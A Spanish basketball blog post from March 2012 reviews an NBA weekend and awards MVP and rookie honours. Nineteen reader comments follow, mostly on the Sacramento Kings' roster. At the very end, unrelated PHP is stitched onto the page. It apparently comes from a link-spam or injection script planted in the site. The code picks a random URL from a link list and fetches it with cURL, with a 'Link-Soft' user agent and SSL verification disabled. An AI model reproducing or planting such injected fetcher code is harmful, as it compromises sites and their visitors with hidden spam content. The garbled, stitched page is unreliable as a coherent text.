Informe del fin de semana: Camisetas nuevas

19 de March de 2012 por txusma

Fin de semanas de estrenos en la NBA. Monta Ellis debutó el viernes ante su ex-equipo con un buen partido, en el que el protagonista principal fue un sorprendente Mbah-a-Moute que se fue a los 22 puntos y 17 rebotes. Los Bucks vencieron cómodamente a los Warriors y se postulan como los rivales a batir para esas últimas plazas de playoffs. Como decía Vader: “Los Bucks con Monta creo que van a apretar ahora porque Bogut ya no estaba jugando y con Ellis ganan un anotador buenísimo.”

Los Knicks, otros de los contendientes para esas plazas, parece que se han puesto las pilas desde la marcha de Mike D’Antoni y han encadenado 3 victorias seguidas, las 2 últimas, muy sólidas, ante los Pacers. Nos lo contó nuevamente Vader, seguidor número 1 del equipo de la Gran Manzana: “(refiriéndose al primer partido) Primer cuarto los Knicks pasando por encima de los Pacers con una gran defensa. Si Melo jugara siempre con esta intensidad…”, “Segunda victoria seguida de los Knicks contra Pacers basada en la defensa y en minimizar las pérdidas de balón. Jeremy Lin el más destacado con 19 puntos 6 asistencias y 7 rebotes.”

Otro que se estrenó fue Ramon Sessions en un partido ante los Wolves que resultó bastante cómodo para los amarillos: “Sí, buenos minutos de Sessions en la primera mitad, haciendo exactamente lo que se necesita de él. Bien en general los Lakers, en especial el banquillo con Barnes, Sessions y McRoberts.” MagicJohnson32. Desgraciadamente para ellos, los Lakers perdieron anoche en casa ante unos Jazz que jugaron sin Al Jefferson pero que contaron con la gran aportación de los jóvenes Alec Burks, Enes Kanter y Derrick Favors. nba nos dejó esta mañana su comentario del partido: “A alguien le sobran unas cuantas mandarinas , ya que parece que Kobe ha acabado con todo el cargamento que tenía disponible, o quizas no ??”. Kobe Bryant anotó sólo 3 de sus 20 lanzamientos…

Otros de los partidos más seguidos del fin de semana fueron los de los Clippers. Éstos se impusieron a Rockets y Pistons pero con muchas dificultades. Como dice MagicJohnson32 “Qué mal llegan a jugar los Clippers… Los partidos son iguales, 3 cuartos y medio lamentables hasta que se acerca el final y Chris Paul dice que se acabó el recreo y es hora de los profesionales. Les ganó el partido él solo a los Rockets y se lo ha ganado a los Pistons (aunque ambos tuvieron tiros para ganar y perdonaron).”. Se desinfla el globo del otrora vecino pobre de L.A.

En el resto de partidos del fin de semana destacamos las victorias de los Heat, ante Sixers y Magic, y las dos victorias de los Kings ante Celtics y Wolves. Los grandes perjudicados han sido Sixers y Celtics con 2 derrotas.

PREMIOS

MVP: Fin de semana dulce para los Clippers con dos victorias ajustadas contra Houston y Detroit. Fundamental Chis Paul en ambas, con la guinda de las 15 asistencias de anoche rozando el triple doble y el delicioso clutch.

El rookie: Además de Kyrie Irving a quien consideramos que ya juega en otra liga entre los rookies, destacamos la extraordinaria actuación de Kenneth Faried contra los Celtics el viernes o la de los novatos de Jazz, Alec Burks y Enes Kanter, para endosarle a los Lakers la segunda derrota en casa desde Navidad.

La sorpresa: Derrick Favors completaba el partido de su vida el sábado ante el “feroz” juego interior Warrior y anoche también fue fundamental en la meritoria victoria en el Staples. Debemos destacar el increíble dejà vú de Michael Redd anoche o los 7 segundos de Rudy Gay para forzar la prórroga contra Toronto el viernes.

La decepción: Lo de anoche de Kobe Bryant tiene muy pocos precedentes. Tirando mal y mucho, eso sí ha ocurrido y tiene un pase, pero no te conformas con eso y pierdes todos los balones del mundo. De milagro se fue a casa sin eficiencia negativa.

El mayor esfuerzo en vano: Están los Celtics como para matarse a disputar dos choques en tres días y terminar palmando ambos. Destacamos a Paul Pierce en ambos.

Comenta

19 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    3/20 Bryant. Nada más que comentar. Sigue a lo suyo…

      Citar

  2. Sancho88 dice:
    #2

    Sobre los Kings, vi ayer la segunda mitad contra Minnesota, pero el viernes me vi el partidazo Spurs-OKC y no les vi contra Boston. Estaría genial que fuera la final de Conferencia entre estos dos equipos. El duelo entre Parker y Westbrook estuvo genial. Y ayer los Wolves fueron un desastre. Sin Pekovic el equipo defiende mucho peor. Además, peleíta entre Barea y Love, con los compañeros separando. Mal rollito…

    Bueno, comento lo que quería comentar. Sin Tyreke, el equipo ganando fácil a Boston y Minnesota, anotando 117,5 puntos en estos dos partidos, y Marcus Thornton promediando 30 puntos por partido, 4,5 rebotes, 4.5 asistencias y 4,5 robos. Esto quiere decir, que el equipo anota más con Thornton asumiendo la responsabilidad, eso es evidente. El último mes de Thornton ha sido un poco flojo, asume menos tiros y se esconde un poco en ataque, pero estos dos últimos partidos, que no ha estado Evans por esguince de tobillo, él ha dado un paso adelante demostrando que no debe ser traspasado. Es una metralleta, un tipo que anota cada noche fácilmente más de 20 puntos, y como él no hay muchos jugadores especialistas en anotación. Además, está haciendo muchas más cosas. El equipo ha declarado que Thornton y Cousins son los únicos insustituibles. De hecho, antes del traspaso a los Bucks, Ellis fue ofrecido a los Kings a cambio de Thornton, y estos rechazaron, igual que Nené a cambio de Cousins, y también rechazaron con buen criterio, lógicamente. Pero a Evans lo intentaron traspasar, se habló de un cambio entre Evans y Batum, y realmente, con Thomas como base titular, y Thornton como metralleta, además de Fredette, que como segundo escolta está bastante bien, quizá pueda sobrar Tyreke. Él necesita sobar mucho la bola para ser efectivo, necesita muchos segundos de posesión para anotar, pero su techo son los 20 puntos, como mucho 25 si está muy inspirado. Y no tiene buenos porcentajes, por lo cual les está quitando tiros fáciles para Thomas y Thornton… no sé, puede ser prescindible para el estilo de juego que les viene bien a los Kings, que es corriendo y aprovechando los buenos tiradores que tiene. Además, si alguien debe acaparar posesiones, ese es DeMarcus Cousins. Él puede sacar faltas a sus defensas, y hacer mucho daño en la pintura, pues es muy incisivo y le gusta jugar ahí. No sé, yo no vería con malos ojos un traspaso por Evans. Hay que saber reconocer las evidencias, y estas son claras con Tyreke. No es un jugador franquicia, y no merece esos galones, muy a mi pesar

      Citar

  3. melo15 dice:
    #3

    Sancho, pero hay que diferenciar de un jugador con potencial all-star como Tyreke y de un jugador que solo anota. Estoy de acuerdo que el jugador franquicia debe ser thorton, pero Evans puede hacer mucho daño con sus penetraciones

      Citar

  4. Sancho88 dice:
    #4

    El problema de Evans, es que, a pesar de ser un jugador bastante completo, que sabe hacer de todo, no anota con mucha facilidad, siempre tiene que buscar entradas casi imposible against the world, y quizá los dos primeros años le pitaban muchas faltas a favor, pero este año le pitan menos y no está sacando muchas ventajas, a veces se ceba demasiado y sus compañeros podrían tener mejores posiciones, la verdad. Thornton como jugador franquicia no, ese sería Cousins, pero como principal baza en el ataque para tirar, yo diría que sí. Pero exigiéndole que sea menos egoísta y que pase la bola, porque es su principal problema. Es decir, su principal virtud, que es armar el tiro rápido, no dudar, y ser muy efectivo con tipos más altos que él punteando sus tiros, a veces se vuelve en su contra, porque no tiene paciencia para mover la bola y buscar al compañero. Si cambia el chip y pasa más la bola, sin duda que puede rendir muy muy bien. Y el talento para anotar 30 puntos no lo tiene Tyreke. Por tanto, creo que es más fácil hacerle ver a Thornton la importancia de pasar la bola, y además mirar a sus compañeros, porque a veces pasa sin mirar, que hacerle mejorar a Tyreke su pésimo tiro exterior. Es que si no mejora y se pone mínimo en un 35% en triples, no puede valer como escolta, y como base le falta autoridad para marcar jugadas, no sabe leer demasiado bien a las defensas, y cada vez aue sube la bola, mira al banquillo a ver qué jugada le marca Smart. Eso no le pasa a Thomas… Complicado lo de Evans… TIene que trabajar mucho en el tiro, pero mucho mucho. No sé, de manera natural veo mejor la pareja Thomas-Thornton, dos metralletas con buena mano, dos amenazas reales, que Evans sufriendo mucho para anotar. Además, con dos tipos más abiertos, es más fácil para Cousins y Thompson, u otro ala pívot que eljan el año que viene, anotar dentro, porque no tienen que dejar sitio para las entradas de Evans. El dibujo de los Kings parece más lógico como lo han jugado este fin de semana, que en el resto de partidos. Veremos qué pasa…

      Citar

  5. nba dice:
    #5

    Alguien domina la lengua de Shakespeare??, es que me gustaría entender lo que ha dicho Kobe, en la entrevista post-partido…

      Citar

  6. Esteban dice:
    #6

    cualquiera de evans, thorton y couisins puede ser el jugadeor franquicia, total los kings no van a tener balance positivo en los proximos años.
    yo imaginaba que esta temporada quedaria con los contratos de los 3 menscionados mas los rookies y que estarian en los 30 millones para la prox temporada, pero me encuentro que tienen 4 años de contratos por pagarle a salmos, a razon de 8 por temporada, 3 a francisco garcia a razon de 6, 4 años a hayes por 5 millones, 4 AÑOS A OULAW POR 3 MILLONES!!! y hickson, 2 años mas por 3 millones,

    con una gerencia firmando contratos asi, que es lo mismo que regalar el dinero, poco se puede esperar, lastima por los 3 que cayeron alli

      Citar

  7. Sancho88 dice:
    #7

    hickson tenía una team option para el año que viene pero no se la han renovado, igual que a Jason Thompson. Seguramente estén buscando un ala-pívot y un alero para el próximo draft. El contrato de Salmons no se lo va a comer nadie ahora mismo, para mí fue un error traerle a cambio de Udrih, con la falta de dirección que tiene el equipo. Y lo de Outlaw… Geoff Petrie cada día hace peor su trabajo, todo el mundo está de acuerdo en que está muy apoltronado y acomodado, pero recientemente los Maloof le han confirmado como el GM del equipo para los próximos años. No sé, últimamente no da una. Quedarse con Fredette cuando tuvo a Walker hecho… me parece un movimiento desastroso que le debería haber costado el cargo. Veremos como evolucionan estos tipos, pero está claro que sin un golpe de suerte que les ponga un gran jugador grande para acompañar a Cousins, mal les veo. Es muy frustrante no aspirar a pasar de las 20-25 victorias campaña sí, campaña también.

      Citar

  8. Esteban dice:
    #8

    coincido sancho, la apuesta por fredette es de lo mas estupida que se puede hacer, vamos el chaval rompia redes en la universidad, pero se notaba a la legua que por fisico, velocidad y direccion de juego no seria un gran jugador nba, se veia que cuando no pudiera tirar todo lo que quisiera y debiera ser un base creador, su carrera nba no pasaria de base suplente

    el potencial de kamba era mucho mayor, aunque yo hubiese preferido intentar con un interno, incluso con montiajunas que cayo hasta el 20, total los kings lo podian esperar, a ver, jugando con un rookie este año son los peores de la nba, asi que tranquilamente podrian haber jugado sin un rookie este año y su nivel seria el mismo

      Citar

  9. Vader dice:
    #9

    Vaya, muchas gracias por citarme. La verdad es que me ha hecho mucha ilusión. Entre semana lo tengo complicado pero el fin de semana cuando pueda ver a mis Knicks seguire comentando.

    Saludos!!

      Citar

  10. Esteban dice:
    #10

    bueno mis ilusiones de ver a gerald green en los lakers, celtics o en un equipo aspirante acaban de desaparecer, los nets lo firman con un contrato garantido hasta el final de la temporada, si bien es cierto que lo ha hecho muy bien con ellos, no parece tener mayor sentido, contando con morrow, brooks y wallace en los puestos con green podria jugar

    veremos si acaba la temporada de la misma gran forma que la arranco

      Citar

  11. HeiNeKeN dice:
    #11

    Parece ser que el Agente Zero vuelve… jugará en Memphis!

      Citar

  12. Esteban dice:
    #12

    HeiNeKeN: Parece ser que el Agente Zero vuelve… jugará en Memphis!

    no tengo dudas que superera las expectativas, ya que son muy bajas, el año pasado estaba lejos de ser un estrella y de merecerse ese mega contrato, pero tampoco estaba tan mal para no conseguir equipo, a principio de temporada estaba en los 18pp en la capital y luego bajo a los 8 en orlando, ME PARECE SUFICIENTE para mantener el lugar en la NBA

      Citar

  13. Inad23 dice:
    #13

    Los rockets han firmado el buy-out(como se diga)… Volvera Fisher a Lakers? XD seria como un boomerang xD

      Citar

  14. Inad23 dice:
    #14

    *se sobreentiende que se lo han hecho a Fisher

      Citar

  15. Lucho dice:
    #15

    Primer minuto del ultimo cuarto y Atlanta lleva anotados en total 51 puntos… Pero va ganando!! 51-50 a los C`s

      Citar

  16. Sancho88 dice:
    #16

    Me parece que con la vuelta de Chandler, Rudy no va a rascar bola…

      Citar

  17. Sancho88 dice:
    #17

    Nowitzki huele la primavera, y algo en su cabeza la dice que tiene que dar un paso adelante de cara a los Playoffs. Esta noche está ganando el solito a los Nuggets. Se demuestra que en Playoffs importa mucho tener un jugador líder, y Denver no lo tiene. Es el típico caso de equipo que hace una buena regular season porque juega muy bien, pero en eliminatorias por el título no tiene ninguna opción. No creo que pasen de primera ronda, a no ser que les toque Clippers. 33-11-6 con 12/19 en tiros de campo, el angelito Nowitzki. Y Brandan Wright como escudero, me parece una buena apuesta, mucho mejor que Haywood y Mahinmi. Aporta mucha solidez en defensa, y tiene movimientos aceptables en el poste, además de ser un tipo rápido para correr en transición. Desde luego, mejora con mucho a los otros dos elementos

      Citar

  18. Sancho88 dice:
    #18

    Por cierto, los Magic otro partido ‘Fibaveando’, es decir, metiendo menos de 60 puntos. No tienen límite estos muchachos…

      Citar

  19. Vader dice:
    #19

    Inad23:
    Los rockets han firmado el buy-out(como se diga)… Volvera Fisher a Lakers? XD seria como un boomerang xD

    A los Lakers no puede volver hasta el año que viene. Eso si, puede fichar por cualquier otro equipo. Suenan Miami, Chicago y Oklahoma.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>